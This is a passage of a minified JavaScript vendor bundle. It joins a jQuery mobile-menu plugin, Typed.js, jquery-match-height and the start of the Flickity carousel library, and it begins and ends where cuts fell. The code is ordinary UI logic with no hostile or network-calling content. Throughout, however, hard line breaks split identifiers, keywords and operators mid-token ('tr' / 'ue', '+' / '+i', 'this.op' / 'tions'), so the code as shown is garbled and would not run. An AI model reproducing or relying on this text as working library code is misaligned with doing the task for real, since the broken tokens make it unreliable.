e(t.target).parent().closest("li").hasClass(s+"_parent"))e(n.btn).click()});if(i.closeOnClick&&i.allowPar
entLinks){t.children("a").children("a").click(function(t){e(n.btn).click()});t.find("."+s+"_parent-link
a:not(."+s+"_item)").click(function(t){e(n.btn).click()})}});e(a).each(function(){var
t=e(this).data("menu");if(!i.showChildren)
{n._visibilityToggle(t.children,null,false,null,true)}});n._visibilityToggle(n.mobileNav,null,false,"init",tr
ue);n.mobileNav.attr("role","menu");e(t).mousedown(function()
{n._outlines(false)});e(t).keyup(function(){n._outlines(true)});e(n.btn).click(function(e)
{e.preventDefault();n._menuToggle()});n.mobileNav.on("click","."+s+"_item",function(t)
{t.preventDefault();n._itemClick(e(this))});e(n.btn).keydown(function(e){var t=e||
event;if(t.keyCode==13)
{e.preventDefault();n._menuToggle()}});n.mobileNav.on("keydown","."+s+"_item",function(t){var
r=t||event;if(r.keyCode==13)
{t.preventDefault();n._itemClick(e(t.target))}});if(i.allowParentLinks&&i.nestedParentLinks)
{e("."+s+"_item a").click(function(e)
{e.stopImmediatePropagation()})}};o.prototype._menuToggle=function(e){var t=this;var n=t.btn;var
r=t.mobileNav;if(n.hasClass(s+"_collapsed"))
{n.removeClass(s+"_collapsed");n.addClass(s+"_open")}else{n.removeClass(s+"_open");n.addClass(s
+"_collapsed")}n.addClass(s+"_animating");t._visibilityToggle(r,n.parent(),true,n)};o.prototype._item
Click=function(e){var t=this;var n=t.settings;var r=e.data("menu");if(!r)
{r={};r.arrow=e.children("."+s+"_arrow");r.ul=e.next("ul");r.parent=e.parent();if(r.parent.hasClass(s+
"_parent-link"))
{r.parent=e.parent().parent();r.ul=e.parent().next("ul")}e.data("menu",r)}if(r.parent.hasClass(s+"_coll
apsed"))
{r.arrow.html(n.openedSymbol);r.parent.removeClass(s+"_collapsed");r.parent.addClass(s+"_open")
;r.parent.addClass(s+"_animating");t._visibilityToggle(r.ul,r.parent,true,e)}else{r.arrow.html(n.closed
Symbol);r.parent.addClass(s+"_collapsed");r.parent.removeClass(s+"_open");r.parent.addClass(s+"_
animating");t._visibilityToggle(r.ul,r.parent,true,e)}};o.prototype._visibilityToggle=function(t,n,r,i,o)
{var u=this;var a=u.settings;var f=u._getActionItems(t);var
l=0;if(r)l=a.duration;if(t.hasClass(s+"_hidden"))
{t.removeClass(s+"_hidden");t.slideDown(l,a.easingOpen,function()
{e(i).removeClass(s+"_animating");e(n).removeClass(s+"_animating");if(!o){a.open(i)}});t.attr("aria-
hidden","false");f.attr("tabindex","0");u._setVisAttr(t,false)}else{t.addClass(s+"_hidden");t.slideUp(l,t
his.settings.easingClose,function(){t.attr("aria-hidden","true");f.attr("tabindex","-
1");u._setVisAttr(t,true);t.hide();e(i).removeClass(s+"_animating");e(n).removeClass(s+"_animating")
;if(!o)a.close(i);else if(i=="init")a.init()})}};o.prototype._setVisAttr=function(t,n){var r=this;var
i=t.children("li").children("ul").not("."+s+"_hidden");if(!n){i.each(function(){var t=e(this);t.attr("aria-
hidden","false");var
i=r._getActionItems(t);i.attr("tabindex","0");r._setVisAttr(t,n)})}else{i.each(function(){var
t=e(this);t.attr("aria-hidden","true");var i=r._getActionItems(t);i.attr("tabindex","-
1");r._setVisAttr(t,n)})}};o.prototype._getActionItems=function(e){var t=e.data("menu");if(!t){t={};var
n=e.children("li");var r=n.find("a");t.links=r.add(n.find("."+s+"_item"));e.data("menu",t)}return
t.links};o.prototype._outlines=function(t){if(!t)
{e("."+s+"_item, ."+s+"_btn").css("outline","none")}else{e("."+s+"_item, ."+s+"_btn").css("outline",""
)}};o.prototype.toggle=function(){var e=this;e._menuToggle()};o.prototype.open=function(){var
e=this;if(e.btn.hasClass(s+"_collapsed")){e._menuToggle()}};o.prototype.close=function(){var
e=this;if(e.btn.hasClass(s+"_open")){e._menuToggle()}};e.fn[i]=function(t){var
n=arguments;if(t===undefined||typeof t==="object"){return this.each(function(){if(!
e.data(this,"plugin_"+i)){e.data(this,"plugin_"+i,new o(this,t))}})}else if(typeof t==="string"&&t[0]!
=="_"&&t!=="init"){var r;this.each(function(){var s=e.data(this,"plugin_"+i);if(s instanceof o&&typeof
s[t]==="function"){r=s[t].apply(s,Array.prototype.slice.call(n,1))}});return r!==undefined?r:this}}})
(jQuery,document,window)

!function($){"use strict";var Typed=function(el,options){this.el=$(el);this.options=$.extend({},


$.fn.typed.defaults,options);this.isInput=this.el.is("input");this.attr=this.options.attr;this.showCursor
=this.isInput?false:this.options.showCursor;this.elContent=this.attr?
this.el.attr(this.attr):this.el.text();this.contentType=this.options.contentType;this.typeSpeed=this.op
tions.typeSpeed;this.startDelay=this.options.startDelay;this.backSpeed=this.options.backSpeed;this.
backDelay=this.options.backDelay;this.stringsElement=this.options.stringsElement;this.strings=this.o
ptions.strings;this.strPos=0;this.arrayPos=0;this.stopNum=0;this.loop=this.options.loop;this.loopCou
nt=this.options.loopCount;this.curLoop=0;this.stop=false;this.cursorChar=this.options.cursorChar;thi
s.shuffle=this.options.shuffle;this.sequence=[];this.build()};Typed.prototype={constructor:Typed,init:
function(){var self=this;self.timeout=setTimeout(function(){for(var i=0;i<self.strings.length;+
+i)self.sequence[i]=i;if(self.shuffle)self.sequence=self.shuffleArray(self.sequence);self.typewrite(self.
strings[self.sequence[self.arrayPos]],self.strPos)},self.startDelay)},build:function(){var
self=this;if(this.showCursor===true){this.cursor=$('<span class="typed-
cursor">'+this.cursorChar+"</span>");this.el.after(this.cursor)}if(this.stringsElement)
{this.strings=[];this.stringsElement.hide();console.log(this.stringsElement.children());var
strings=this.stringsElement.children();$.each(strings,function(key,value){self.strings.push($
(value).html())})}this.init()},typewrite:function(curString,curStrPos){if(this.stop===true){return}var
humanize=Math.round(Math.random()*(100-30))+this.typeSpeed;var
self=this;self.timeout=setTimeout(function(){var charPause=0;var
substr=curString.substr(curStrPos);if(substr.charAt(0)==="^"){var skip=1;if(/^\^\d+/.test(substr))
{substr=/\d+/.exec(substr)
[0];skip+=substr.length;charPause=parseInt(substr)}curString=curString.substring(0,curStrPos)
+curString.substring(curStrPos+skip)}if(self.contentType==="html"){var
curChar=curString.substr(curStrPos).charAt(0);if(curChar==="<"||curChar==="&"){var tag="";var
endTag="";if(curChar==="<")
{endTag=">"}else{endTag=";"}while(curString.substr(curStrPos+1).charAt(0)!==endTag)
{tag+=curString.substr(curStrPos).charAt(0);curStrPos++;if(curStrPos+1>curString.length)
{break}}curStrPos++;tag+=endTag}}self.timeout=setTimeout(function()
{if(curStrPos===curString.length)
{self.options.onStringTyped(self.arrayPos);if(self.arrayPos===self.strings.length-1)
{self.options.callback();self.curLoop++;if(self.loop===false||
self.curLoop===self.loopCount)return}self.timeout=setTimeout(function()
{self.backspace(curString,curStrPos)},self.backDelay)}else{if(curStrPos===0)
{self.options.preStringTyped(self.arrayPos)}var
nextString=curString.substr(0,curStrPos+1);if(self.attr)
{self.el.attr(self.attr,nextString)}else{if(self.isInput){self.el.val(nextString)}else
if(self.contentType==="html"){self.el.html(nextString)}else{self.el.text(nextString)}}curStrPos+
+;self.typewrite(curString,curStrPos)}},charPause)},humanize)},backspace:function(curString,curStrP
os){if(this.stop===true){return}var humanize=Math.round(Math.random()*(100-30))
+this.backSpeed;var self=this;self.timeout=setTimeout(function(){if(self.contentType==="html")
{if(curString.substr(curStrPos).charAt(0)===">"){var tag="";while(curString.substr(curStrPos-
1).charAt(0)!=="<"){tag-=curString.substr(curStrPos).charAt(0);curStrPos--;if(curStrPos<0)
{break}}curStrPos--;tag+="<"}}var nextString=curString.substr(0,curStrPos);if(self.attr)
{self.el.attr(self.attr,nextString)}else{if(self.isInput){self.el.val(nextString)}else
if(self.contentType==="html")
{self.el.html(nextString)}else{self.el.text(nextString)}}if(curStrPos>self.stopNum)
{curStrPos--;self.backspace(curString,curStrPos)}else if(curStrPos<=self.stopNum){self.arrayPos+
+;if(self.arrayPos===self.strings.length)
{self.arrayPos=0;if(self.shuffle)self.sequence=self.shuffleArray(self.sequence);self.init()}else
self.typewrite(self.strings[self.sequence[self.arrayPos]],curStrPos)}},humanize)},shuffleArray:functio
n(array){var tmp,current,top=array.length;if(top)while(--top)
{current=Math.floor(Math.random()*(top+1));tmp=array[current];array[current]=array[top];array[to
p]=tmp}return array},reset:function(){var self=this;clearInterval(self.timeout);var
id=this.el.attr("id");this.el.empty();if(typeof this.cursor!=="undefined")
{this.cursor.remove()}this.strPos=0;this.arrayPos=0;this.curLoop=0;this.options.resetCallback()}};
$.fn.typed=function(option){return this.each(function(){var $this=$
(this),data=$this.data("typed"),options=typeof option=="object"&&option;if(data){data.reset()}
$this.data("typed",data=new Typed(this,options));if(typeof option=="string")data[option]()})};
$.fn.typed.defaults={strings:["These are the default values...","You know what you should do?","Use
your own!","Have a great
day!"],stringsElement:null,typeSpeed:0,startDelay:0,backSpeed:0,shuffle:false,backDelay:500,loop:fa
lse,loopCount:false,showCursor:true,cursorChar:"|",attr:null,contentType:"html",callback:function()
{},preStringTyped:function(){},onStringTyped:function(){},resetCallback:function(){}}}
(window.jQuery);

/*
* jquery-match-height 0.7.0 by @liabru

* http://brm.io/jquery-match-height/

* License MIT

*/

!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!


=typeof module&&module.exports?module.exports=t(require("jquery")):t(jQuery)}(function(t){var
e=-1,o=-1,i=function(t){return parseFloat(t)||0},a=function(e){var o=1,a=t(e),n=null,r=[];return
a.each(function(){var e=t(this),a=e.offset().top-i(e.css("margin-top")),s=r.length>0?r[r.length-
1]:null;null===s?r.push(e):Math.floor(Math.abs(n-a))<=o?r[r.length-
1]=s.add(e):r.push(e),n=a}),r},n=function(e){var o={

byRow:!0,property:"height",target:null,remove:!1};return"object"==typeof e?t.extend(o,e):
("boolean"==typeof e?o.byRow=e:"remove"===e&&(o.remove=!
0),o)},r=t.fn.matchHeight=function(e){var o=n(e);if(o.remove){var i=this;return
this.css(o.property,""),t.each(r._groups,function(t,e){e.elements=e.elements.not(i)}),this}return
this.length<=1&&!o.target?this:
(r._groups.push({elements:this,options:o}),r._apply(this,o),this)};r.version="0.7.0",r._groups=[],r._thr
ottle=80,r._maintainScroll=!1,r._beforeUpdate=null,

r._afterUpdate=null,r._rows=a,r._parse=i,r._parseOptions=n,r._apply=function(e,o){var
s=n(o),h=t(e),l=[h],c=t(window).scrollTop(),p=t("html").outerHeight(!
0),d=h.parents().filter(":hidden");return d.each(function(){var e=t(this);e.data("style-
cache",e.attr("style"))}),d.css("display","block"),s.byRow&&!s.target&&(h.each(function(){var
e=t(this),o=e.css("display");"inline-block"!==o&&"flex"!==o&&"inline-flex"!
==o&&(o="block"),e.data("style-cache",e.attr("style")),e.css({display:o,"padding-top":"0",

"padding-bottom":"0","margin-top":"0","margin-bottom":"0","border-top-width":"0","border-
bottom-width":"0",height:"100px",overflow:"hidden"})}),l=a(h),h.each(function(){var
e=t(this);e.attr("style",e.data("style-cache")||"")})),t.each(l,function(e,o){var
a=t(o),n=0;if(s.target)n=s.target.outerHeight(!1);else{if(s.byRow&&a.length<=1)return void
a.css(s.property,"");a.each(function(){var e=t(this),o=e.attr("style"),i=e.css("display");"inline-block"!
==i&&"flex"!==i&&"inline-flex"!==i&&(i="block");var a={

display:i};a[s.property]="",e.css(a),e.outerHeight(!1)>n&&(n=e.outerHeight(!1)),o?
e.attr("style",o):e.css("display","")})}a.each(function(){var e=t(this),o=0;s.target&&e.is(s.target)||
("border-box"!==e.css("box-sizing")&&(o+=i(e.css("border-top-width"))+i(e.css("border-bottom-
width")),o+=i(e.css("padding-top"))+i(e.css("padding-bottom"))),e.css(s.property,n-
o+"px"))})}),d.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||
null)}),r._maintainScroll&&t(window).scrollTop(c/p*t("html").outerHeight(!0)),

this},r._applyDataApi=function(){var e={};t("[data-match-height], [data-mh]").each(function(){var


o=t(this),i=o.attr("data-mh")||o.attr("data-match-height");i in e?
e[i]=e[i].add(o):e[i]=o}),t.each(e,function(){this.matchHeight(!0)})};var s=function(e)
{r._beforeUpdate&&r._beforeUpdate(e,r._groups),t.each(r._groups,function()
{r._apply(this.elements,this.options)}),r._afterUpdate&&r._afterUpdate(e,r._groups)};r._update=fun
ction(i,a){if(a&&"resize"===a.type){var n=t(window).width();if(n===e)return;e=n;
}i?-1===o&&(o=setTimeout(function(){s(a),o=-
1},r._throttle)):s(a)},t(r._applyDataApi),t(window).bind("load",function(t){r._update(!
1,t)}),t(window).bind("resize orientationchange",function(t){r._update(!0,t)})});

/*!

* Flickity PACKAGED v1.0.0

* Touch, responsive, flickable galleries

* Licensed GPLv3 for open source use

* or Flickity Commercial License for commercial use

* http://flickity.metafizzy.co

* Copyright 2015 Metafizzy

*/

!function(t){function e(){}function i(t){function i(e){e.prototype.option||


(e.prototype.option=function(e){t.isPlainObject(e)&&(this.options=t.extend(!
0,this.options,e))})}function o(e,i){t.fn[e]=function(o){if("string"==typeof o){for(var
s=n.call(arguments,1),a=0,l=this.length;l>a;a++){var
h=this[a],c=t.data(h,e);if(c)if(t.isFunction(c[o])&&"_"!==o.charAt(0)){var d=c[o].apply(c,s);if(void 0!
==d)return d}else r("no such method '"+o+"' for "+e+" instance");else r("cannot call methods on
"+e+" prior to initialization; attempted to call '"+o+"'")}return this}return this.each(function(){var
n=t.data(this,e);n?(n.option(o),n._init()):(n=new i(this,o),t.data(this,e,n))})}}if(t){var
r="undefined"==typeof console?e:function(t){console.error(t)};return t.bridget=function(t,e)
{i(e),o(t,e)},t.bridget}}var n=Array.prototype.slice;"function"==typeof define&&define.amd?
define("jquery-bridget/jquery.bridget",["jquery"],i):i("object"==typeof exports?
require("jquery"):t.jQuery)}(window),function(t){function e(t){return new
RegExp("(^|\\s+)"+t+"(\\s+|$)")}function i(t,e){var i=n(t,e)?r:o;i(t,e)}var n,o,r;"classList"in
document.documentElement?(n=function(t,e){return t.classList.contains(e)},o=function(t,e)
{t.classList.add(e)},r=function(t,e){t.classList.remove(e)}):(n=function(t,i){return
e(i).test(t.className)},o=function(t,e){n(t,e)||(t.className=t.className+" "+e)},r=function(t,i)
{t.className=t.className.replace(e(i)," ")});var
s={hasClass:n,addClass:o,removeClass:r,toggleClass:i,has:n,add:o,remove:r,toggle:i};"function"==typ
eof define&&define.amd?define("classie/classie",s):"object"==typeof exports?
module.exports=s:t.classie=s}(window),function(){function t(){}function e(t,e){for(var
i=t.length;i--;)if(t[i].listener===e)return i;return-1}function i(t){return function(){return
this[t].apply(this,arguments)}}var n=t.prototype,o=this,r=o.EventEmitter;n.getListeners=function(t)
{var e,i,n=this._getEvents();if(t instanceof RegExp){e={};for(i in
n)n.hasOwnProperty(i)&&t.test(i)&&(e[i]=n[i])}else e=n[t]||(n[t]=[]);return
e},n.flattenListeners=function(t){var e,i=[];for(e=0;e<t.length;e+=1)i.push(t[e].listener);return
i},n.getListenersAsObject=function(t){var e,i=this.getListeners(t);return i instanceof
Array&&(e={},e[t]=i),e||i},n.addListener=function(t,i){var
n,o=this.getListenersAsObject(t),r="object"==typeof i;for(n in o)o.hasOwnProperty(n)&&-
1===e(o[n],i)&&o[n].push(r?i:{listener:i,once:!1});return
this},n.on=i("addListener"),n.addOnceListener=function(t,e){return this.addListener(t,
{listener:e,once:!0})},n.once=i("addOnceListener"),n.defineEvent=function(t){return
this.getListeners(t),this},n.defineEvents=function(t){for(var
e=0;e<t.length;e+=1)this.defineEvent(t[e]);return this},n.removeListener=function(t,i){var
n,o,r=this.getListenersAsObject(t);for(o in r)r.hasOwnProperty(o)&&(n=e(r[o],i),-1!
==n&&r[o].splice(n,1));return this},n.off=i("removeListener"),n.addListeners=function(t,e){return
this.manipulateListeners(!1,t,e)},n.removeListeners=function(t,e){return this.manipulateListeners(!
0,t,e)},n.manipulateListeners=function(t,e,i){var n,o,r=t?this.removeListener:this.addListener,s=t?
this.removeListeners:this.addListeners;if("object"!=typeof e||e instanceof
RegExp)for(n=i.length;n--;)r.call(this,e,i[n]);else for(n in
e)e.hasOwnProperty(n)&&(o=e[n])&&("function"==typeof o?r.call(this,n,o):s.call(this,n,o));return
this},n.removeEvent=function(t){var e,i=typeof t,n=this._getEvents();if("string"===i)delete n[t];else
if(t instanceof RegExp)for(e in n)n.hasOwnProperty(e)&&t.test(e)&&delete n[e];else delete
this._events;return this},n.removeAllListeners=i("removeEvent"),n.emitEvent=function(t,e){var
i,n,o,r,s=this.getListenersAsObject(t);for(o in s)if(s.hasOwnProperty(o))for(n=s[o].length;n--;)i=s[o]
[n],i.once===!0&&this.removeListener(t,i.listener),r=i.listener.apply(this,e||
[]),r===this._getOnceReturnValue()&&this.removeListener(t,i.listener);return
this},n.trigger=i("emitEvent"),n.emit=function(t){var
e=Array.prototype.slice.call(arguments,1);return
this.emitEvent(t,e)},n.setOnceReturnValue=function(t){return
this._onceReturnValue=t,this},n._getOnceReturnValue=function(){return
this.hasOwnProperty("_onceReturnValue")?this._onceReturnValue:!0},n._getEvents=function()
{return this._events||(this._events={})},t.noConflict=function(){return
o.EventEmitter=r,t},"function"==typeof define&&define.amd?define("eventEmitter/EventEmitter",
[],function(){return t}):"object"==typeof module&&module.exports?
module.exports=t:o.EventEmitter=t}.call(this),function(t){function e(e){var i=t.event;return
i.target=i.target||i.srcElement||e,i}var i=document.documentElement,n=function()
{};i.addEventListener?n=function(t,e,i){t.addEventListener(e,i,!1)}:i.attachEvent&&(n=function(t,i,n)
{t[i+n]=n.handleEvent?function(){var i=e(t);n.handleEvent.call(n,i)}:function(){var
i=e(t);n.call(t,i)},t.attachEvent("on"+i,t[i+n])});var o=function(){};i.removeEventListener?
o=function(t,e,i){t.removeEventListener(e,i,!1)}:i.detachEvent&&(o=function(t,e,i)
{t.detachEvent("on"+e,t[e+i]);try{delete t[e+i]}catch(n){t[e+i]=void 0}});var
r={bind:n,unbind:o};"function"==typeof define&&define.amd?
define("eventie/eventie",r):"object"==typeof exports?module.exports=r:t.eventie=r}
(window),function(t){function e(t){if(t){if("string"==typeof n[t])return t;t=t.charAt(0).toUpperCase()
+t.slice(1);for(var e,o=0,r=i.length;r>o;o++)if(e=i[o]+t,"string"==typeof n[e])return e}}var i="Webkit
Moz ms Ms O".split(" "),n=document.documentElement.style;"function"==typeof
define&&define.amd?define("get-style-property/get-style-property",[],function(){return
e}):"object"==typeof exports?module.exports=e:t.getStyleProperty=e}(window),function(t){function
e(t){var e=parseFloat(t),i=-1===t.indexOf("%")&&!isNaN(e);return i&&e}function i(){}function n()
{for(var
t={width:0,height:0,innerWidth:0,innerHeight:0,outerWidth:0,outerHeight:0},e=0,i=s.length;i>e;e++)
{var n=s[e];t[n]=0}return t}function o(i){function o(){if(!p){p=!0;var
n=t.getComputedStyle;if(h=function(){var t=n?function(t){return n(t,null)}:function(t){return
t.currentStyle};return function(e){var i=t(e);return i||r("Style returned "+i+". Are you running this
code in a hidden iframe on Firefox? See http://bit.ly/getsizebug1"),i}}(),c=i("boxSizing")){var
o=document.createElement("div");o.style.width="200px",o.style.padding="1px 2px 3px
4px",o.style.borderStyle="solid",o.style.borderWidth="1px 2px 3px 4px",o.style[c]="border-box";var
s=document.body||document.documentElement;s.appendChild(o);var
a=h(o);d=200===e(a.width),s.removeChild(o)}}}function a(t){if(o(),"string"==typeof
t&&(t=document.querySelector(t)),t&&"object"==typeof t&&t.nodeType){var
i=h(t);if("none"===i.display)return n();var r={};r.width=t.offsetWidth,r.height=t.offsetHeight;for(var
a=r.isBorderBox=!(!c||!i[c]||"border-box"!==i[c]),p=0,u=s.length;u>p;p++){var
f=s[p],v=i[f];v=l(t,v);var y=parseFloat(v);r[f]=isNaN(y)?0:y}var
g=r.paddingLeft+r.paddingRight,m=r.paddingTop+r.paddingBottom,b=r.marginLeft+r.marginRight,x=
r.marginTop+r.marginBottom,S=r.borderLeftWidth+r.borderRightWidth,C=r.borderTopWidth+r.bord
erBottomWidth,w=a&&d,E=e(i.width);E!==!1&&(r.width=E+(w?0:g+S));var P=e(i.height);return P!==!
1&&(r.height=P+(w?0:m+C)),r.innerWidth=r.width-(g+S),r.innerHeight=r.height-
(m+C),r.outerWidth=r.width+b,r.outerHeight=r.height+x,r}}function l(e,i){if(t.getComputedStyle||-
1===i.indexOf("%"))return i;var n=e.style,o=n.left,r=e.runtimeStyle,s=r&&r.left;return
s&&(r.left=e.currentStyle.left),n.left=i,i=n.pixelLeft,n.left=o,s&&(r.left=s),i}var h,c,d,p=!1;return a}var
r="undefined"==typeof console?i:function(t)
{console.error(t)},s=["paddingLeft","paddingRight","paddingTop","paddingBottom","marginLeft","m
arginRight","marginTop","marginBottom","borderLeftWidth","borderRightWidth","borderTopWidth
","borderBottomWidth"];"function"==typeof define&&define.amd?define("get-size/get-size",["get-
style-property/get-style-property"],o):"object"==typeof exports?
module.exports=o(require("desandro-get-style-property")):t.getSize=o(t.getStyleProperty)}
(window),function(t){function e(t){"function"==typeof t&&(e.isReady?t():s.push(t))}function i(t){var
i="readystatechange"===t.type&&"complete"!==r.readyState;e.isReady||i||n()}function n()
{e.isReady=!0;for(var t=0,i=s.length;i>t;t++){var n=s[t];n()}}function o(o)
{return"complete"===r.readyState?n():
(o.bind(r,"DOMContentLoaded",i),o.bind(r,"readystatechange",i),o.bind(t,"load",i)),e}var
r=t.document,s=[];e.isReady=!1,"function"==typeof define&&define.amd?define("doc-ready/doc-
ready",["eventie/eventie"],o):"object"==typeof exports?
module.exports=o(require("eventie")):t.docReady=o(t.eventie)}(window),function(t){function e(t,e)
{return t[s](e)}function i(t){if(!t.parentNode){var
e=document.createDocumentFragment();e.appendChild(t)}}function n(t,e){i(t);for(var
n=t.parentNode.querySelectorAll(e),o=0,r=n.length;r>o;o++)if(n[o]===t)return!0;return!1}function
o(t,n){return i(t),e(t,n)}var r,s=function(){if(t.matchesSelector)return"matchesSelector";for(var
e=["webkit","moz","ms","o"],i=0,n=e.length;n>i;i++){var o=e[i],r=o+"MatchesSelector";if(t[r])return
r}}();if(s){var a=document.createElement("div"),l=e(a,"div");r=l?e:o}else r=n;"function"==typeof
define&&define.amd?define("matches-selector/matches-selector",[],function(){return
r}):"object"==typeof exports?module.exports=r:window.matchesSelector=r}
(Element.prototype),function(t,e){"function"==typeof define&&define.amd?define("fizzy-ui-
utils/utils",["doc-ready/doc-ready","matches-selector/matches-selector"],function(i,n){return
e(t,i,n)}):"object"==typeof exports?module.exports=e(t,require("doc-ready"),require("desandro-
matches-selector")):t.fizzyUIUtils=e(t,t.docReady,t.matchesSelector)}(window,function(t,e,i)
{function n(t){return t.replace(/(.)([A-Z])/g,function(t,e,i){return e+"-"+i}).toLowerCase()}var
o={};o.extend=function(t,e){for(var i in e)t[i]=e[i];return t},o.modulo=function(t,e){return(t%e+e)
%e};var r=Object.prototype.toString;o.isArray=function(t){return"[object
Array]"==r.call(t)},o.makeArray=function(t){var e=[];if(o.isArray(t))e=t;else if(t&&"number"==typeof
t.length)for(var i=0,n=t.length;n>i;i++)e.push(t[i]);else e.push(t);return
e},o.indexOf=Array.prototype.indexOf?function(t,e){return t.indexOf(e)}:function(t,e){for(var
i=0,n=t.length;n>i;i++)if(t[i]===e)return i;return-1},o.removeFrom=function(t,e){var i=o.indexOf(t,e);-
1!=i&&t.splice(i,1)},o.isElement="function"==typeof HTMLElement||"object"==typeof
HTMLElement?function(t){return t instanceof HTMLElement}:function(t){return
t&&"object"==typeof t&&1==t.nodeType&&"string"==typeof t.nodeName},o.setText=function()
{function t(t,i){e=e||(void 0!
==document.documentElement.textContent?"textContent":"innerText"),t[e]=i}var e;return t}
(),o.getParent=function(t,e){for(;t!=document.body;)if(t=t.parentNode,i(t,e))return
t},o.getQueryElement=function(t){return"string"==typeof t?
document.querySelector(t):t},o.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e]
(t)},o.filterFindElements=function(t,e){t=o.makeArray(t);for(var n=[],r=0,s=t.length;s>r;r++){var
a=t[r];if(o.isElement(a))if(e){i(a,e)&&n.push(a);for(var l=a.querySelectorAll(e),h=0,c=l.length;c>h;h+
+)n.push(l[h])}else n.push(a)}return n},o.debounceMethod=function(t,e,i){var
n=t.prototype[e],o=e+"Timeout";t.prototype[e]=function(){var t=this[o];t&&clearTimeout(t);var
e=arguments,r=this;this[o]=setTimeout(function(){n.apply(r,e),delete r[o]},i||100)}};var
s=t.jQuery,a=t.console;return o.htmlInit=function(t,i){e(function(){for(var
e=n(i),o=document.querySelectorAll(".js-"+e),r="data-"+e+"-options",l=0,h=o.length;h>l;l++){var
c,d=o[l],p=d.getAttribute(r);try{c=p&&JSON.parse(p)}catch(u){a&&a.error("Error parsing "+r+" on
"+d.nodeName.toLowerCase()+(d.id?"#"+d.id:"")+": "+u);continue}var f=new
t(d,c);s&&s.data(d,i,f)}})},o}),function(t,e){"function"==typeof define&&define.amd?
define("flickity/js/cell",["get-size/get-size"],function(i){return e(t,i)}):"object"==typeof exports?
module.exports=e(t,require("get-size")):(t.Flickity=t.Flickity||{},t.Flickity.Cell=e(t,t.getSize))}
(window,function(t,e){function i(t,e){this.element=t,this.parent=e,this.create()}var
n="attachEvent"in t;return i.prototype.create=function()
{this.element.style.position="absolute",n&&this.element.setAttribute("unselectable","on"),this.x=0,t
his.shift=0},i.prototype.destroy=function(){this.element.style.position="";var
t=this.parent.originSide;this.element.style[t]=""},i.prototype.getSize=function()
{this.size=e(this.element)},i.prototype.setPosition=function(t)
{this.x=t,this.setDefaultTarget(),this.renderPosition(t)},i.prototype.setDefaultTarget=function(){var
t="left"==this.parent.originSide?"marginLeft":"marginRight";this.target=this.x+this.size[t]
+this.size.width*this.parent.cellAlign},i.prototype.renderPosition=function(t){var
e=this.parent.originSide;this.element.style[e]=this.parent.getPositionValue(t)},i.prototype.wrapShift
=function(t)
{this.shift=t,this.renderPosition(this.x+this.parent.slideableWidth*t)},i.prototype.remove=function()
{this.element.parentNode.removeChild(this.element)},i}),function(t,e){"function"==typeof
define&&define.amd?define("flickity/js/animate",["get-style-property/get-style-property","fizzy-ui-
utils/utils"],function(i,n){return e(t,i,n)}):"object"==typeof exports?
module.exports=e(t,require("desandro-get-style-property"),require("fizzy-ui-utils")):
(t.Flickity=t.Flickity||{},t.Flickity.animatePrototype=e(t,t.getStyleProperty,t.fizzyUIUtils))}
(window,function(t,e,i){for(var n,o=0,r="webkit moz ms o".split("
"),s=t.requestAnimationFrame,a=t.cancelAnimationFrame,l=0;l<r.length&&(!s||!a);l++)n=r[l],s=s||
t[n+"RequestAnimationFrame"],a=a||t[n+"CancelAnimationFrame"]||
t[n+"CancelRequestAnimationFrame"];s&&a||(s=function(e){var i=(new
Date).getTime(),n=Math.max(0,16-(i-o)),r=t.setTimeout(function(){e(i+n)},n);return
o=i+n,r},a=function(e){t.clearTimeout(e)});var h={};h.startAnimation=function(){this.isAnimating||
(this.isAnimating=!0,this.restingFrames=0,this.animate())},h.animate=function()
{this.applySelectedAttraction();var
t=this.x;if(this.integratePhysics(),this.positionSlider(),this.settle(t),this.isAnimating){var
e=this;s(function(){e.animate()})}};var c=e("transform"),d=!!e("perspective");return
h.positionSlider=function(){var
t=this.x;this.options.wrapAround&&this.cells.length>1&&(t=i.modulo(t,this.slideableWidth),t-
=this.slideableWidth,this.shiftWrapCells(t)),t+=this.cursorPosition,t=this.options.rightToLeft&&c?-
t:t;var e=this.getPositionValue(t);c?
this.slider.style[c]=d&&this.isAnimating?"translate3d("+e+",0,0)":"translateX("+e+")":this.slider.style
[this.originSide]=e},h.positionSliderAtSelected=function(){if(this.cells.length){var
t=this.cells[this.selectedIndex];this.x=-t.target,this.positionSlider()}},h.getPositionValue=function(t)
{return
this.options.percentPosition?.01*Math.round(t/this.size.innerWidth*1e4)+"%":Math.round(t)
+"px"},h.settle=function(t){this.isPointerDown||Math.round(100*this.x)!=Math.round(100*t)||
this.restingFrames++,this.restingFrames>2&&(this.isAnimating=!1,delete
this.isFreeScrolling,d&&this.positionSlider(),this.dispatchEvent("settle"))},h.shiftWrapCells=function(
t){var e=this.cursorPosition+t;this._shiftCells(this.beforeShiftCells,e,-1);var i=this.size.innerWidth-
(t+this.slideableWidth+this.cursorPosition);this._shiftCells(this.afterShiftCells,i,1)},h._shiftCells=func
tion(t,e,i){for(var n=0,o=t.length;o>n;n++){var r=t[n],s=e>0?i:0;r.wrapShift(s),e-
=r.size.outerWidth}},h._unshiftCells=function(t){if(t&&t.length)for(var e=0,i=t.length;i>e;e+
+)t[e].wrapShift(0)},h.integratePhysics=function()
{this.velocity+=this.accel,this.x+=this.velocity,this.velocity*=this.getFrictionFactor(),this.accel=0},h.a
pplyForce=function(t){this.accel+=t},h.getFrictionFactor=function(){return 1-
this.options[this.isFreeScrolling?"freeScrollFriction":"friction"]},h.getRestingPosition=function()
{return this.x+this.velocity/(1-this.getFrictionFactor())},h.applySelectedAttraction=function(){var
t=this.cells.length;if(!this.isPointerDown&&!this.isFreeScrolling&&t){var
e=this.cells[this.selectedIndex],i=this.options.wrapAround&&t>1?
this.slideableWidth*Math.floor(this.selectedIndex/t):0,n=-1*(e.target+i)-
this.x,o=n*this.options.selectedAttraction;this.applyForce(o)}},h}),function(t,e){if("function"==typeof
define&&define.amd)define("flickity/js/flickity",
["classie/classie","eventEmitter/EventEmitter","eventie/eventie","get-size/get-size","fizzy-ui-
utils/utils","./cell","./animate"],function(i,n,o,r,s,a,l){return e(t,i,n,o,r,s,a,l)});else if("object"==typeof
exports)module.exports=e(t,require("desandro-classie"),require("wolfy87-
eventemitter"),require("eventie"),require("get-size"),require("fizzy-ui-
utils"),require("./cell"),require("./animate"));else{var
i=t.Flickity;t.Flickity=e(t,t.classie,t.EventEmitter,t.eventie,t.getSize,t.fizzyUIUtils,i.Cell,i.animateProtot
